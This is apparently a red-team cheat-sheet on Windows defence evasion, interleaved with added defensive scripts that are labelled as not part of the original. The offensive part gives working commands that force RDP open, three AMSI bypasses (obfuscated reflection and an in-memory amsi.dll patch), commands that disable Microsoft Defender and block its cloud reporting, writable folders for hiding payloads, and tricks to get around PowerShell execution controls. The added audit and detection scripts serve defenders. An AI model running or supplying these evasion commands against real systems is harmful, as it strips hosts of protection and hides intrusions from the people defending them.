# Defense Evasion

## Firewall Modification

### Allowing RDP

PowerShell

{% code overflow="wrap" %}

```powershell
Set-itemproperty 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server\' -Name "fDenyTSConnections" -value 0
Set-ItemProperty 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp\' -Name "UserAuthentication" -value 1
Enable-NetFirewallRule -DisplayGroup "Remote Desktop"
```

{% endcode %}

Windows Commands

{% code overflow="wrap" %}

```powershell
reg add "hklm\system\currentControlSet\Control\Terminal Server" /v "AllowTSConnections" /t REG_DWORD /d 0x1 /f
reg add "hklm\system\currentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0x0 /f
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fAllowToGetHelp /t REG_DWORD /d 1 /f
netsh advfirewall firewall set rule group="remote administration" new enable=yes
netsh advfirewall firewall set rule group="remote desktop" new enable=Yes
netsh advfirewall firewall set rule group="remote desktop" new enable=Yes profile=domain
netsh advfirewall firewall set rule group="remote desktop" new enable=Yes profile=private
netsh firewall add portopening TCP 3389 "Remote Desktop"
netsh firewall set service RemoteDesktop enable
netsh firewall set service RemoteDesktop enable profile=ALL
netsh firewall set service RemoteAdmin enable
sc config TermService start= auto
net start Termservice
```

{% endcode %}
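The defender's counterpart to the commands above, as an added example that is not part of the original page: a read-only audit that reports the exact registry values, firewall rule groups and service state those commands change, plus the most recent firewall rule-change events. All cmdlets are standard Windows ones; the assumption that `Properties[1]` of events 2004/2005/2006 holds the rule name is mine and is marked in the code.

```powershell
# Added example (not from the original page): read-only audit of the RDP
# settings and firewall rule groups that the enable-RDP commands change.
# Run in an elevated PowerShell on the host under review.

function Get-RdpExposureReport {
    $tsKey  = 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server'
    $rdpKey = "$tsKey\WinStations\RDP-Tcp"

    # fDenyTSConnections = 0 means RDP accepts connections;
    # UserAuthentication = 0 means Network Level Authentication is off
    $deny = (Get-ItemProperty -Path $tsKey  -Name fDenyTSConnections -ErrorAction SilentlyContinue).fDenyTSConnections
    $nla  = (Get-ItemProperty -Path $rdpKey -Name UserAuthentication -ErrorAction SilentlyContinue).UserAuthentication

    # Count enabled rules in the groups the netsh / Enable-NetFirewallRule lines touch
    $enabled = @{}
    foreach ($group in 'Remote Desktop', 'Remote Administration') {
        $rules = Get-NetFirewallRule -DisplayGroup $group -ErrorAction SilentlyContinue
        $enabled[$group] = @($rules | Where-Object { $_.Enabled -eq 'True' }).Count
    }

    $svc      = Get-Service -Name TermService -ErrorAction SilentlyContinue
    $svcState = if ($svc) { "$($svc.Status) / $($svc.StartType)" } else { 'not installed' }

    [pscustomobject]@{
        RdpEnabled                = ($deny -eq 0)
        NlaRequired               = ($nla -eq 1)
        EnabledRemoteDesktopRules = $enabled['Remote Desktop']
        EnabledRemoteAdminRules   = $enabled['Remote Administration']
        TermService               = $svcState
    }
}

function Get-RecentFirewallRuleChanges {
    param([int]$Count = 20)
    # 2004 = rule added, 2005 = rule modified, 2006 = rule deleted.
    # Assumption: Properties[1] of these events carries the rule name.
    Get-WinEvent -FilterHashtable @{
        LogName = 'Microsoft-Windows-Windows Firewall With Advanced Security/Firewall'
        Id      = 2004, 2005, 2006
    } -MaxEvents $Count -ErrorAction SilentlyContinue |
        Select-Object TimeCreated, Id, @{ n = 'Rule'; e = { $_.Properties[1].Value } }
}

# A host where RdpEnabled flips to $true and a 2004/2005 event for the
# "Remote Desktop" group appears outside a change window is worth a look;
# Sysmon event 13 on fDenyTSConnections gives the same signal in real time.
Get-RdpExposureReport | Format-List
Get-RecentFirewallRuleChanges | Format-Table -AutoSize
```

`Get-RdpExposureReport` is safe to run repeatedly and can be scheduled; diffing its output against a known-good baseline catches the registry and rule-group changes listed above without relying on the event log having survived.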

## AMSI Bypasses

A classic resource: <https://amsi.fail/>

{% code overflow="wrap" %}

```powershell
[Ref].Assembly.GetType('System.Management.Automation.Ams'+'iUtils').GetField('am'+'siInitFailed','NonPu'+'blic,Static').SetValue($null,$true)
```

{% endcode %}

{% code overflow="wrap" %}

```powershell
SeT-Item ( 'V'+'aR' + 'IA' + ('blE:1'+'q2') + ('uZ'+'x') ) ( TYpE ) ; ( Get-varIABLE ( ('1Q'+'2U') +'zX' ) -VaL )."AssEmbly"."GETTYPe"(( "{6}{3}{1}{4}{2}{0}{5}" -f('Uti'+'l'),'A',('Am'+'si'),('.Man'+'age'+'men'+'t.'),('u'+'to'+'mation.'),'s',('Syst'+'em') ) )."getfiElD"( ( "{0}{2}{1}" -f('a'+'msi'),'d',('I'+'nitF'+'aile') ),( "{2}{4}{0}{1}{3}" -f ('S'+'tat'),'i',('Non'+'Publ'+'i'),'c','c,' ))."sETVaLUE"( ${nULl},${tRuE} );
```

{% endcode %}

{% code overflow="wrap" %}

```powershell
$fzxhw = @"
using System;
using System.Runtime.InteropServices;
public class fzxhw {
    [DllImport("kernel32")] public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);
    [DllImport("kernel32")] public static extern IntPtr LoadLibrary(string name);
    [DllImport("kernel32")] public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr vilqbn, uint flNewProtect, out uint lpflOldProtect);
}
"@
Add-Type $fzxhw
$jvdnuxs = [fzxhw]::LoadLibrary("$(('ämsî'+'.dll').NORMALiZE(chAr+ChaR+ChAr+CHar+cHar) -replace ChAr+ChAR+cHAR+ChaR+chAr+CHar)")
$ikbtnz = [fzxhw]::GetProcAddress($jvdnuxs, "$(cHAR+Char+chaR+cHAr+ChAr+Char+cHaR+chAR+chAr+cHAr+CHar+cHaR+CHaR+CHar)")
$p = 0
[fzxhw]::VirtualProtect($ikbtnz, [uint32]5, 0x40, [ref]$p)
$ovsj = "0xB8"
$zahw = "0x57"
$cfuu = "0x00"
$ukxu = "0x07"
$salu = "0x80"
$yrkl = "0xC3"
$xrnun = [Byte[]] ($ovsj,$zahw,$cfuu,$ukxu,+$salu,+$yrkl)
[System.Runtime.InteropServices.Marshal]::Copy($xrnun, 0, $ikbtnz, 6)
```

{% endcode %}
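The three bypasses above share a small set of tell-tales (the `AmsiUtils` / `amsiInitFailed` reflection, `amsi.dll` plus `VirtualProtect` plus `Marshal::Copy`) that string splitting, `-f` formatting and random casing are meant to hide from naive string matching. The following is an added example, not code from the original page, of a script-block-log (Event ID 4104) hunt that first collapses `'a'+'b'` concatenations and then scores both AMSI indicators and obfuscation signals. The sample script blocks at the bottom are constructed fragments for offline testing; the `[k32]` type name in sample 3 is made up.

```powershell
# Added example (not from the original page): hunt PowerShell script block
# logs for AMSI-tampering patterns, normalising the obfuscation shown above.

$AmsiIndicators = @(
    'AmsiUtils', 'amsiInitFailed', 'amsiContext', 'AmsiScanBuffer',
    'amsi\.dll', '\bamsi\b', 'VirtualProtect', 'Marshal\]::Copy', 'NonPublic,\s*Static'
)
# Names whose canonical casing is known; a mixed-case mismatch suggests random-casing
$KnownNames = 'Set-Item', 'Get-Variable', 'Add-Type', 'Invoke-Expression',
              'GetType', 'GetField', 'SetValue', 'Assembly', 'Normalize'

function ConvertFrom-StringConcat {
    param([string]$Text)
    # Collapse 'a'+'b' / "a"+"b" into 'ab' so split names reassemble
    # (e.g. 'Ams'+'iUtils' -> 'AmsiUtils'); repeat until nothing changes.
    $pattern = '(["''])([^"'']*)\1\s*\+\s*(["''])([^"'']*)\3'
    $prev = $null
    while ($prev -ne $Text) {
        $prev = $Text
        $Text = [regex]::Replace($Text, $pattern, '$1$2$4$1')
    }
    return $Text
}

function Test-AmsiTamper {
    param([string]$ScriptBlockText)
    $norm = ConvertFrom-StringConcat $ScriptBlockText
    $hits = @($AmsiIndicators | Where-Object { $norm -match $_ })

    $obf = @()
    if ([regex]::Matches($ScriptBlockText, '[''"]\s*\+\s*[''"]').Count -ge 3) { $obf += 'string-splitting' }
    if ([regex]::Matches($ScriptBlockText, '\{\d+\}').Count -ge 2 -and $ScriptBlockText -match '-f\b') { $obf += 'format-operator' }
    $oddCase = [regex]::Matches($ScriptBlockText, '[A-Za-z]+(?:-[A-Za-z]+)?') |
        ForEach-Object { $_.Value } |
        Where-Object {
            ($KnownNames -contains $_) -and -not ($KnownNames -ccontains $_) -and
            ($_ -cne $_.ToLower()) -and ($_ -cne $_.ToUpper())
        }
    if (@($oddCase).Count -gt 0) { $obf += 'random-case' }

    $verdict = if ($hits.Count -ge 2 -or ($hits.Count -ge 1 -and $obf.Count -ge 1)) { 'amsi-tamper' }
               elseif ($obf.Count -ge 2) { 'obfuscated' }
               else { 'clean' }

    [pscustomobject]@{
        Verdict     = $verdict
        Indicators  = $hits -join ','
        Obfuscation = $obf -join ','
        Normalized  = $norm.Substring(0, [Math]::Min(70, $norm.Length))
    }
}

# Constructed sample script blocks (fragments, not complete bypasses):
$samples = @(
    # 1: amsiInitFailed reflection split with '+'
    "[Ref].Assembly.GetType('System.Management.Automation.Ams'+'iUtils').GetField('am'+'siInitFailed','NonPu'+'blic,Static')",
    # 2: random casing plus -f format-operator assembly
    "SeT-Item ('V'+'aR'+'IA'+('blE:1'+'q2')) (TYpE); (Get-varIABLE ('1Q'+'2U'+'zX') -VaL).""AssEmbly"".""GETTYPe""((""{1}{0}"" -f ('Uti'+'l'),('Am'+'si')))",
    # 3: in-memory patching shape ([k32] is a made-up P/Invoke type name)
    '$h = [k32]::LoadLibrary("amsi.dll"); [k32]::VirtualProtect($a, [uint32]5, 0x40, [ref]$p); [Runtime.InteropServices.Marshal]::Copy($patch, 0, $a, 6)',
    # 4: benign admin one-liner
    'Get-ChildItem C:\Windows\Temp | Where-Object { $_.Length -gt 1MB }'
)
$samples | ForEach-Object { Test-AmsiTamper $_ } | Format-Table -AutoSize

# Live use (needs script block logging enabled; Properties[2] of 4104 is ScriptBlockText):
# Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-PowerShell/Operational'; Id = 4104 } -MaxEvents 500 |
#     ForEach-Object { Test-AmsiTamper $_.Properties[2].Value } | Where-Object Verdict -ne 'clean'
```

Samples 1 to 3 come out as `amsi-tamper` and sample 4 as `clean`. The normalisation step is what matters: without it, sample 1 never contains the string `AmsiUtils`, which is exactly why the authors split it. Script block logging also records the de-obfuscated block when the runtime compiles it, so pairing this with the matching 4104 "ScriptBlockId" chain gives the plain-text version as well.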

## Microsoft Defender for Endpoint

Note: The MDE sensor queues its events locally while it cannot reach the cloud, so as soon as connectivity is re-established the backlog is uploaded and the floodgates open.

### Getting Current Status

{% code overflow="wrap" %}

```powershell
Get-MpComputerStatus
```

{% endcode %}

### Adding an Exclusion

{% code overflow="wrap" %}

```powershell
Add-MpPreference -ExclusionPath 'C:\windows\temp'
```

{% endcode %}

### Scanning a File with Defender

{% code overflow="wrap" %}

```powershell
& 'C:\Program Files\Windows Defender\MpCmdRun.exe' -Scan -ScanType 3 -DisableRemediation -File 'C:\stager.exe'
```

{% endcode %}

### Disabling Defender

{% code overflow="wrap" %}

```powershell
taskkill /F /IM MSASCuiL.exe

Set-MpPreference -DisableIntrusionPreventionSystem $true `
-DisableRealtimeMonitoring $true -DisableScriptScanning $true `
-EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode `
-Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend

REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "HideSCAHealth" /t REG_DWORD /d 0x1 /f
REG ADD "HKCU\Software\Policies\Microsoft\Windows\Explorer" /v "DisableNotificationCenter" /t REG_DWORD /d 0x1 /f
REG DELETE "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 0x1 /f
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "AllowFastServiceStartup" /t REG_DWORD /d 0x0 /f
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "ServiceKeepAlive" /t REG_DWORD /d 0x0 /f
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d 0x1 /f
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 0x1 /f
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d 0x1 /f
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "LocalSettingOverrideSpynetReporting" /t REG_DWORD /d 0x0 /f
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 0x2 /f
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\UX Configuration" /v "NotificationSuppress" /t REG_DWORD /d 0x1 /f
```

{% endcode %}

### Disable Defender on Reboot

A BlackByte TTP

{% code overflow="wrap" %}

```powershell
powershell -command "$x = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String('VwBpA'+'G4ARA B'+'lAGYA'+'ZQB'+'uAG'+'QA'));Stop-Service -Name $x;Set-Service -StartupType Disabled $x"
```

{% endcode %}

### Reviewing AppLocker Policies

{% code overflow="wrap" %}

```powershell
$a = Get-ApplockerPolicy -effective; $a.rulecollections;
```

{% endcode %}

You can also review the Defender exclusions and the AppLocker policy (stored under `SrpV2`) by querying the registry directly:

{% code overflow="wrap" %}

```powershell
reg query "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions" /s
reg query "HKEY_LOCAL_Machine\Software\Policies\Microsoft\Windows\SrpV2" /s
```

{% endcode %}

### Blocking MS Defender Connections

```powershell
New-NetFirewallRule -DisplayName "Block 443 MsMpEng" -Name "Block 443 MsMpEng" -Direction Outbound -Service WinDefend -Enabled True -RemotePort 443 -Protocol TCP -Action Block
New-NetFirewallRule -DisplayName "Block 443 SenseCncProxy" -Name "Block 443 SenseCncProxy" -Direction Outbound -Program "%ProgramFiles%\Windows Defender Advanced Threat Protection\SenseCncProxy.exe" -RemotePort 443 -Protocol TCP -Action Block
New-NetFirewallRule -DisplayName "Block 443 MsSense" -Name "Block 443 MsSense" -Direction Outbound -Program "%ProgramFiles%\Windows Defender Advanced Threat Protection\MsSense.exe" -RemotePort 443 -Protocol TCP -Action Block
```
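Taken together, the "Adding an Exclusion", "Disabling Defender" and "Blocking MS Defender Connections" sections describe four places a tampered Defender shows up: `Get-MpPreference` flags, exclusion lists, the HKLM policy keys (which override local preferences) and outbound firewall block rules aimed at Defender/MDE binaries. The following is an added example, not code from the original page, of one report that checks all four and the tamper-protection state. It uses only built-in cmdlets and the registry values named above.

```powershell
# Added example (not from the original page): report the Defender settings,
# exclusions, policy overrides and firewall rules that the tampering
# commands in the sections above would leave behind. Run elevated.

function Get-DefenderTamperReport {
    $status = Get-MpComputerStatus
    $pref   = Get-MpPreference

    # Preference switches flipped by the Set-MpPreference line; $true is a finding
    $disabled = [ordered]@{
        RealtimeMonitoring  = $pref.DisableRealtimeMonitoring
        ScriptScanning      = $pref.DisableScriptScanning
        IOAVProtection      = $pref.DisableIOAVProtection
        BehaviorMonitoring  = $pref.DisableBehaviorMonitoring
        IntrusionPrevention = $pref.DisableIntrusionPreventionSystem
    }
    $disabledList = @($disabled.GetEnumerator() | Where-Object { $_.Value } | ForEach-Object { $_.Key })

    # Exclusions: user-writable paths such as C:\windows\temp are the classic finding
    $exclusions = @(@($pref.ExclusionPath) + @($pref.ExclusionProcess) + @($pref.ExclusionExtension) | Where-Object { $_ })

    # Policy values written by the REG ADD lines; these win over local preferences
    $policyKey = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender'
    $policy = [ordered]@{}
    foreach ($pair in @(
            @($policyKey, 'DisableAntiSpyware'),
            @("$policyKey\Real-Time Protection", 'DisableRealtimeMonitoring'),
            @("$policyKey\Real-Time Protection", 'DisableIOAVProtection'),
            @("$policyKey\Spynet", 'SubmitSamplesConsent'))) {
        $v = Get-ItemProperty -Path $pair[0] -Name $pair[1] -ErrorAction SilentlyContinue
        if ($v) { $policy[$pair[1]] = $v.($pair[1]) }
    }

    # Outbound block rules bound to the WinDefend service or Defender/MDE executables
    $blockRules = @(Get-NetFirewallRule -Direction Outbound -Action Block -ErrorAction SilentlyContinue |
        Where-Object {
            $app = ($_ | Get-NetFirewallApplicationFilter).Program
            $svc = ($_ | Get-NetFirewallServiceFilter).Service
            $svc -eq 'WinDefend' -or $app -match 'MsMpEng|MsSense|SenseCncProxy|Windows Defender'
        })

    [pscustomobject]@{
        TamperProtected    = $status.IsTamperProtected
        RealTimeEnabled    = $status.RealTimeProtectionEnabled
        DisabledByPref     = $disabledList -join ','
        Exclusions         = $exclusions -join ';'
        PolicyOverrides    = (@($policy.GetEnumerator() | ForEach-Object { "$($_.Key)=$($_.Value)" })) -join ';'
        DefenderBlockRules = ($blockRules | ForEach-Object { $_.DisplayName }) -join ';'
        WinDefendService   = (Get-Service -Name WinDefend -ErrorAction SilentlyContinue).Status
    }
}

Get-DefenderTamperReport | Format-List
```

With tamper protection on, most of the `Set-MpPreference` and `REG ADD` changes above are rejected or reverted, so `TamperProtected = False` is the first thing to explain. The firewall check matters because a host whose sensor is blocked on port 443 still looks healthy locally; it only goes quiet in the MDE console, and once the block rule is removed the queued events arrive in a burst, as the note at the top of this section warns.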

### **Default Writable Folders for Execution Control Bypass**

Try putting your payload in one of the following directories:

{% code overflow="wrap" %}

```powershell
C:\Windows\System32\Microsoft\Crypto\RSA\MachineKeys
C:\Windows\System32\spool\drivers\color
C:\Windows\Tasks
C:\windows\tracing
```

{% endcode %}
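These folders matter because default AppLocker and WDAC rules allow execution from anywhere under `C:\Windows`, so a user-writable directory there is an execution-control gap. The following is an added example, not code from the original page, that reads the ACL of each listed path and flags those where low-privilege principals hold write, modify, generic-write or full-control rights; the list of low-privilege identities and the path list are defaults you can extend.

```powershell
# Added example (not from the original page): find directories under
# C:\Windows where low-privilege principals can create or modify files.

function Get-LowPrivWritableDirs {
    param(
        [string[]]$Paths = @(
            'C:\Windows\System32\Microsoft\Crypto\RSA\MachineKeys',
            'C:\Windows\System32\spool\drivers\color',
            'C:\Windows\Tasks',
            'C:\Windows\tracing'
        ),
        [string[]]$LowPriv = @('BUILTIN\Users', 'NT AUTHORITY\Authenticated Users',
                               'Everyone', 'NT AUTHORITY\INTERACTIVE')
    )
    # Explicit rights that let a principal drop or alter a file
    $writeMask = [int][System.Security.AccessControl.FileSystemRights]'CreateFiles, Write, Modify, FullControl'
    # Generic rights show up as raw bits: GENERIC_ALL (0x10000000) | GENERIC_WRITE (0x40000000)
    $genericWrite = 0x50000000

    foreach ($p in $Paths) {
        if (-not (Test-Path -LiteralPath $p)) { continue }
        $acl = Get-Acl -LiteralPath $p
        $writers = @($acl.Access | Where-Object {
            $rights = [int]$_.FileSystemRights
            $_.AccessControlType -eq 'Allow' -and
            ($LowPriv -contains $_.IdentityReference.Value) -and
            ((($rights -band $writeMask) -ne 0) -or (($rights -band $genericWrite) -ne 0))
        } | ForEach-Object { $_.IdentityReference.Value } | Select-Object -Unique)

        [pscustomobject]@{
            Path         = $p
            LowPrivWrite = ($writers.Count -gt 0)
            Writers      = $writers -join ','
        }
    }
}

# Pair the result with the effective AppLocker policy from the section above:
# a path that is LowPrivWrite = $true and not covered by a deny/path exception
# is the gap to close.
Get-LowPrivWritableDirs | Format-Table -AutoSize
```

The usual fix is not to change the ACLs (the spooler and crypto services rely on them) but to add AppLocker or WDAC deny rules for these paths so that the default "allow everything under `%WINDIR%`" rule no longer covers them; Microsoft's AppLocker design guidance lists the same directories as recommended exceptions.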

## PowerShell Execution

### Nested PowerShell Bypass

{% code overflow="wrap" %}

```powershell
powershell.exe -enc [BASE64THIS(powershell.exe -w hidden -c "iex(...)")]
```

{% endcode %}

### **32-Bit PowerShell Bypass**

PowerShell disabled for you? Try running the 32-bit copy of it:

{% code overflow="wrap" %}

```sh
C:\windows\syswow64\windowspowershell\v1.0\powershell whoami
```

{% endcode %}
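Both tricks above (an encoded command that launches a second, hidden PowerShell, and falling back to the 32-bit host under `SysWOW64`) leave a distinctive process command line. The following is an added example, not code from the original page, that peels `-enc` / `-EncodedCommand` layers until none remain and flags the hidden-window, `iex` and WOW64 patterns over process-creation events. The samples are constructed at run time (the inner command is base64-encoded by the script itself, so no pre-computed blob is involved); the 4688 property index in the comment is an assumption that holds when command-line auditing is enabled.

```powershell
# Added example (not from the original page): decode nested encoded
# PowerShell command lines and flag the launch patterns shown above.

function ConvertFrom-EncodedCommand {
    param([string]$CommandLine, [int]$MaxDepth = 5)
    # Returns the original line followed by each decoded layer (UTF-16LE base64),
    # stopping when no -e/-ec/-enc/-EncodedCommand argument is left.
    $layers = @($CommandLine)
    for ($i = 0; $i -lt $MaxDepth; $i++) {
        $m = [regex]::Match($layers[-1], '(?i)-e[a-z]*\s+([A-Za-z0-9+/=]{16,})')
        if (-not $m.Success) { break }
        try {
            $bytes  = [Convert]::FromBase64String($m.Groups[1].Value)
            $layers += [Text.Encoding]::Unicode.GetString($bytes)
        } catch { break }
    }
    return ,$layers
}

function Test-PowerShellLaunch {
    param([string]$CommandLine)
    $layers = @(ConvertFrom-EncodedCommand $CommandLine)
    $all    = $layers -join "`n"
    $flags  = @()
    if ($layers.Count -gt 2)     { $flags += 'nested-encoded' }
    elseif ($layers.Count -eq 2) { $flags += 'encoded' }
    if ($all -match '(?i)-w[a-z]*\s+hidden')                        { $flags += 'hidden-window' }
    if ($all -match '(?i)\biex\b|Invoke-Expression')                 { $flags += 'iex' }
    if ($all -match '(?i)DownloadString|Invoke-WebRequest|\biwr\b')  { $flags += 'download' }
    if ($CommandLine -match '(?i)\\SysWOW64\\WindowsPowerShell')     { $flags += 'wow64-powershell' }

    [pscustomobject]@{
        Flags   = $flags -join ','
        Depth   = $layers.Count - 1
        Decoded = $layers[-1]
    }
}

# Constructed samples: the encoded blobs are produced here, not captured.
$inner = 'powershell.exe -w hidden -c "iex(...)"'
$enc1  = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($inner))
$enc2  = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes("powershell.exe -enc $enc1"))
$samples = @(
    "powershell.exe -enc $enc1",                                          # the nested bypass above (one layer)
    "powershell.exe -enc $enc2",                                          # two layers of encoding
    'C:\windows\syswow64\windowspowershell\v1.0\powershell whoami',       # 32-bit host
    'powershell.exe -ExecutionPolicy Bypass -File C:\scripts\backup.ps1'  # ordinary admin use
)
$samples | ForEach-Object { Test-PowerShellLaunch $_ } | Format-Table -AutoSize

# Live use: Security 4688 with "Include command line in process creation events"
# enabled; assumption: Properties[8] is the CommandLine field.
# Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4688 } -MaxEvents 1000 |
#     Where-Object { $_.Properties[5].Value -match 'powershell' } |
#     ForEach-Object { Test-PowerShellLaunch $_.Properties[8].Value } | Where-Object Flags
```

The first two samples come out as `encoded,hidden-window,iex` and `nested-encoded,hidden-window,iex`, the third as `wow64-powershell`, and the last with no flags. On the prevention side, the 32-bit bypass only works where the execution-control or Constrained Language policy names `C:\Windows\System32\WindowsPowerShell\...` and forgets the `SysWOW64` copy; rules written against the publisher or the `%WINDIR%`-relative path cover both.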
